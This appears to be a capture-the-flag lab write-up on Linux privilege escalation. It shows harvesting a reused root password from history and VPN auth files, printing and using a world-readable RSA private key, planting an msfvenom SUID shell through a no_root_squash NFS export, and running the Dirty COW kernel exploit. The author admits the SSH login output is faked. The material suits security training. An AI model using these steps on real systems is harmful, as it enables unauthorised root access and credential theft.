uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)

Task 16 – Passwords & Keys – History Files

If a user accidently types their password on the command line instead of into a password prompt, it may get recorded in a "history file". Bash, for example, saves your command history in ~/.bash_history.

Let’s see if the owner of this box left behind any clues…:

user@debian:~$ cat ~/.*history
ls -al
cat .bash_history 
ls -al
mysql -h somehost.local -uroot -ppassword123
exit
cd /tmp
clear
ifconfig
netstat -antp
nano myvpn.ovpn

Looking at the above output, we can see they tried to access MySQL via command line, password and all! … worst still, they have reused that password on the actual root account!

user@debian:~$ su root
Password: password123
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/home/user#

What is the full mysql command the user executed?

Task 17 – Passwords & Keys – Config Files

Config files can be a treasure-trove of information – even passwords!

Note below, the user has a file named myvpn.ovpn – lets have a look:

user@debian:~$ ls
myvpn.ovpn  tools
user@debian:~$ cat myvpn.ovpn 
client
dev tun
proto udp
remote 10.10.10.10 1194
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
tls-client
remote-cert-tls server
auth-user-pass /etc/openvpn/auth.txt
comp-lzo
verb 1
reneg-sec 0

There is a line in this file starting with auth-user-pass that points to a text file…

user@debian:~$ cat /etc/openvpn/auth.txt
root
password123

Hello there!root login details! 😉

What file did you find the root user's credentials in?

Task 18 – Passwords & Keys – SSH Keys

Sometimes users make backups of important files, but fail to secure them with the correct permissions…

Let’s check / for any hidden files or folders:

user@debian:~$ ls -la /
total 96
drwxr-xr-x 22 root root  4096 Aug 25  2019 .
drwxr-xr-x 22 root root  4096 Aug 25  2019 ..
drwxr-xr-x  2 root root  4096 Aug 25  2019 bin
drwxr-xr-x  3 root root  4096 May 12  2017 boot
drwxr-xr-x 12 root root  2820 Nov 24 02:59 dev
drwxr-xr-x 67 root root  4096 Nov 24 05:20 etc
drwxr-xr-x  3 root root  4096 May 15  2017 home
lrwxrwxrwx  1 root root    30 May 12  2017 initrd.img -> boot/initrd.img-2.6.32-5-amd64
drwxr-xr-x 12 root root 12288 May 14  2017 lib
lrwxrwxrwx  1 root root     4 May 12  2017 lib64 -> /lib
drwx------  2 root root 16384 May 12  2017 lost+found
drwxr-xr-x  3 root root  4096 May 12  2017 media
drwxr-xr-x  2 root root  4096 Jun 11  2014 mnt
drwxr-xr-x  2 root root  4096 May 12  2017 opt
dr-xr-xr-x 96 root root     0 Nov 24 02:57 proc
drwx------  5 root root  4096 May 15  2020 root
drwxr-xr-x  2 root root  4096 May 13  2017 sbin
drwxr-xr-x  2 root root  4096 Jul 21  2010 selinux
drwxr-xr-x  2 root root  4096 May 12  2017 srv
drwxr-xr-x  2 root root  4096 Aug 25  2019 .ssh
drwxr-xr-x 13 root root     0 Nov 24 02:57 sys
drwxrwxrwt  2 root root  4096 Nov 24 05:30 tmp
drwxr-xr-x 11 root root  4096 May 13  2017 usr
drwxr-xr-x 14 root root  4096 May 13  2017 var
lrwxrwxrwx  1 root root    27 May 12  2017 vmlinuz -> boot/vmlinuz-2.6.32-5-amd64

Notice the .ssh folder? Let’s investigate that one further…

user@debian:~$ ls -al /.ssh
total 12
drwxr-xr-x  2 root root 4096 Aug 25  2019 .
drwxr-xr-x 22 root root 4096 Aug 25  2019 ..
-rw-r--r--  1 root root 1679 Aug 25  2019 root_key

A world-readable file named root_key – it’s a PRIVATE KEY:

user@debian:~$ cat /.ssh/root_key
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA3IIf6Wczcdm38MZ9+QADSYq9FfKfwj0mJaUteyJHWHZ3/GNm
gLTH3Fov2Ss8QuGfvvD4CQ1f4N0PqnaJ2WJrKSP8QyxJ7YtRTk0JoTSGWTeUpExl
p4oSmTxYnO0LDcsezwNhBZn0kljtGu9p+dmmKbk40W4SWlTvU1LcEHRr6RgWMgQo
OHhxUFddFtYrknS4GiL5TJH6bt57xoIECnRc/8suZyWzgRzbo+TvDewK3ZhBN7HD
eV9G5JrjnVrDqSjhysUANmUTjUCTSsofUwlum+pU/dl9YCkXJRp7Hgy/QkFKpFET
Z36Z0g1JtQkwWxUD/iFj+iapkLuMaVT5dCq9kQIDAQABAoIBAQDDWdSDppYA6uz2
NiMsEULYSD0z0HqQTjQZbbhZOgkS6gFqa3VH2OCm6o8xSghdCB3Jvxk+i8bBI5bZ
YaLGH1boX6UArZ/g/mfNgpphYnMTXxYkaDo2ry/C6Z9nhukgEy78HvY5TCdL79Q+
5JNyccuvcxRPFcDUniJYIzQqr7laCgNU2R1lL87Qai6B6gJpyB9cP68rA02244el
WUXcZTk68p9dk2Q3tk3r/oYHf2LTkgPShXBEwP1VkF/2FFPvwi1JCCMUGS27avN7
VDFru8hDPCCmE3j4N9Sw6X/sSDR9ESg4+iNTsD2ziwGDYnizzY2e1+75zLyYZ4N7
6JoPCYFxAoGBAPi0ALpmNz17iFClfIqDrunUy8JT4aFxl0kQ5y9rKeFwNu50nTIW
1X+343539fKIcuPB0JY9ZkO9d4tp8M1Slebv/p4ITdKf43yTjClbd/FpyG2QNy3K
824ihKlQVDC9eYezWWs2pqZk/AqO2IHSlzL4v0T0GyzOsKJH6NGTvYhrAoGBAOL6
Wg07OXE08XsLJE+ujVPH4DQMqRz/G1vwztPkSmeqZ8/qsLW2bINLhndZdd1FaPzc
U7LXiuDNcl5u+Pihbv73rPNZOsixkklb5t3Jg1OcvvYcL6hMRwLL4iqG8YDBmlK1
Rg1CjY1csnqTOMJUVEHy0ofroEMLf/0uVRP3VsDzAoGBAIKFJSSt5Cu2GxIH51Zi
SXeaH906XF132aeU4V83ZGFVnN6EAMN6zE0c2p1So5bHGVSCMM/IJVVDp+tYi/GV
d+oc5YlWXlE9bAvC+3nw8P+XPoKRfwPfUOXp46lf6O8zYQZgj3r+0XLd6JA561Im
jQdJGEg9u81GI9jm2D60xHFFAoGAPFatRcMuvAeFAl6t4njWnSUPVwbelhTDIyfa
871GglRskHslSskaA7U6I9QmXxIqnL29ild+VdCHzM7XZNEVfrY8xdw8okmCR/ok
X2VIghuzMB3CFY1hez7T+tYwsTfGXKJP4wqEMsYntCoa9p4QYA+7I+LhkbEm7xk4
CLzB1T0CgYB2Ijb2DpcWlxjX08JRVi8+R7T2Fhh4L5FuykcDeZm1OvYeCML32EfN
Whp/Mr5B5GDmMHBRtKaiLS8/NRAokiibsCmMzQegmfipo+35DNTW66DDq47RFgR4
LnM9yXzn+CbIJGeJk5XUFQuLSv0f6uiaWNi7t9UNyayRmwejI6phSw==
-----END RSA PRIVATE KEY-----

Lets dump this into a file locally, and see if it lets us connect!

❯ v root_key
❯ chmod 600 root_key
❯ ssh -i root_key root@10.10.200.127
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 25 14:02:49 2019 from 192.168.1.2
root@debian:~#

NOTE: This didn’t actually work on my box when trying to connect to this box… I have also had issues with Host Key Algorithms and have to force SSH connections to this box with -oHostKeyAlgorithms=+ssh-rsa to connect… the above output is unfortunately faked. 🙁

Task 19 – NFS

Files created via NFS inherit the remote user’s ID. If the user is root, and root squashing is enabled, the ID will instead be set to the "nobody" user.

Check the NFS share configuration on the target:

user@debian:~$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#       to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#

/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)

#/tmp *(rw,sync,insecure,no_subtree_check)

Notice how the only enabled line has no_root_squash set as an option? This gives us a window to remotely create a backdoor (on attacking machine)! 😉

❯ sudo mkdir tmp
❯ sudo mount -o rw,vers=2 10.10.200.127:/tmp /home/stimpz/tryhackme/linux_privesc/tmp
❯ cd tmp
❯ ls
backup.tar.gz  rootbash  root.pm  useless
❯ sudo msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o shell    
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 48 bytes
Final size of elf file: 132 bytes
Saved as: shell
❯ sudo chmod +xs shell
❯ ls -al
total 1028
drwxrwxrwt 2 root   root     4096 Nov 24 22:15 .
drwxr-xr-x 1 stimpz stimpz     88 Nov 24 22:10 ..
-rw-r--r-- 1 root   root    94900 Nov 24 22:15 backup.tar.gz
-rwsr-sr-x 1 root   root   926536 Nov 24 22:15 rootbash
-rw-r--r-- 1 stimpz stimpz     60 Nov 24 20:04 root.pm
-rwsr-sr-x 1 root   root      132 Nov 24 22:14 shell
-rw-r--r-- 1 root   root       29 Nov 24 19:09 useless

Now lets try running that file on the target:

user@debian:~$ /tmp/shell
bash-4.1# id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)

What is the name of the option that disables root squashing?

Task 20 – Kernel Exploits

Kernel exploits can leave a system in an unstable state, which is why you should only run them as a last resort.

Run the Linux Exploit Suggester 2 tool to identify potential kernel exploits on the current system:

user@debian:~$ perl /home/user/tools/kernel-exploits/linux-exploit-suggester-2/linux-exploit-suggester-2.pl

  #############################
    Linux Exploit Suggester 2
  #############################

  Local Kernel: 2.6.32
  Searching 72 exploits...

  Possible Exploits
  [1] american-sign-language
      CVE-2010-4347
      Source: http://www.securityfocus.com/bid/45408
  [2] can_bcm
      CVE-2010-2959
      Source: http://www.exploit-db.com/exploits/14814
  [3] dirty_cow
      CVE-2016-5195
      Source: http://www.exploit-db.com/exploits/40616
  [4] exploit_x
      CVE-2018-14665
      Source: http://www.exploit-db.com/exploits/45697
  [5] half_nelson1
      Alt: econet       CVE-2010-3848
      Source: http://www.exploit-db.com/exploits/17787
  [6] half_nelson2
      Alt: econet       CVE-2010-3850
      Source: http://www.exploit-db.com/exploits/17787
  [7] half_nelson3
      Alt: econet       CVE-2010-4073
      Source: http://www.exploit-db.com/exploits/17787
  [8] msr
      CVE-2013-0268
      Source: http://www.exploit-db.com/exploits/27297
  [9] pktcdvd
      CVE-2010-3437
      Source: http://www.exploit-db.com/exploits/15150
  [10] ptrace_kmod2
      Alt: ia32syscall,robert_you_suck       CVE-2010-3301
      Source: http://www.exploit-db.com/exploits/15023
  [11] rawmodePTY
      CVE-2014-0196
      Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
  [12] rds
      CVE-2010-3904
      Source: http://www.exploit-db.com/exploits/15285
  [13] reiserfs
      CVE-2010-1146
      Source: http://www.exploit-db.com/exploits/12130
  [14] video4linux
      CVE-2010-3081
      Source: http://www.exploit-db.com/exploits/15024

One of the most popular kernel exploits, known as "Dirty C0W" is listed at number 3 – the source code for this exploit is available at /home/user/tools/kernel-exploits/dirtycow/ and it is named c0w.c. This exploit uses the kernel exploit to overwrite the SUID binary /usr/bin/passwd with one that spawns a root shell.

Compile the code and run it (note that it might take several minutes to complete):

user@debian:~$ gcc -pthread /home/user/tools/kernel-exploits/dirtycow/c0w.c -o c0w
user@debian:~$ ./c0w

   (___)                                   
   (o o)_____/                             
    @@ `     \                            
     \ ____, //usr/bin/passwd                          
     //    //                              
    ^^    ^^                               
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
mmap 74d5f000

madvise 0

ptrace 0

Once compiled and exploited, simply run /usr/bin/passwd and it will drop you into a root shell:

user@debian:~$ /usr/bin/passwd
root@debian:/home/user# id
uid=0(root) gid=1000(user) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)

Task 21 – Privilege Escalation Scripts

This task was purely running tools such as linPEAS, Linux Smart Enumeration and linEnum to see if the exploits above showed up… without attaching some SUPER LONG output from some of these above tools, let’s just say over all three they covered pretty much everything AND MORE. This is one of the core reasons that one of my personal first moves when getting onto a box is to run at least one of these and go from there. 😉

linPEAS – The most popular and advanced Linux privilege escalation scanner on the market!
Linux Smart Enumeration – A very thorough and detailed PrivEsc method scanner, can be controlled how much detail it outputs!
linEnum – The original Linux PrivEsc checker, although now depreciated by the above two (and abandoned as of 2 years ago).